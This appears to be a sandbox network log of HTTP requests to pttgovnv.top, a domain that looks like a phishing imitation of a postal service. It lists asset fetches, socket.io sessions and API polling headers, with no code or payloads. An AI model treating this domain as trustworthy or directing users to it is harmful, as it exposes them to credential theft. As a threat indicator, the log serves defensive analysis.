Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f4397cedkFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liL4Q HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/164f9b57JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC4zMDIxMDgwNzc2NjI2MDU5NA== HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/0e738ae1JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liL4Q HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: zzXQZkQ66b3Ce9lg/lVchw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /help/frames/0/index.html HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/8560f9bdkFGym.woff HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttgovnv.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f18e42bakFGym.woff HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttgovnv.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/2e158738kFGym.woff HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttgovnv.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/164f9b57JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLHP&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLHG&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/8b4af40ckFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLz4&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLHP&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/32.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/33.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/34.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC4zMTIwODY0MDU2MjE5NDY4 HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/35.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/36.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/32.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/37.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/33.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/38.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/39.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/40.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/41.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/34.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/35.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMOa HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/42.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/36.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/43.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/37.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/38.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/44.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/39.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/45.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/40.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/41.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMU5&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/42.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
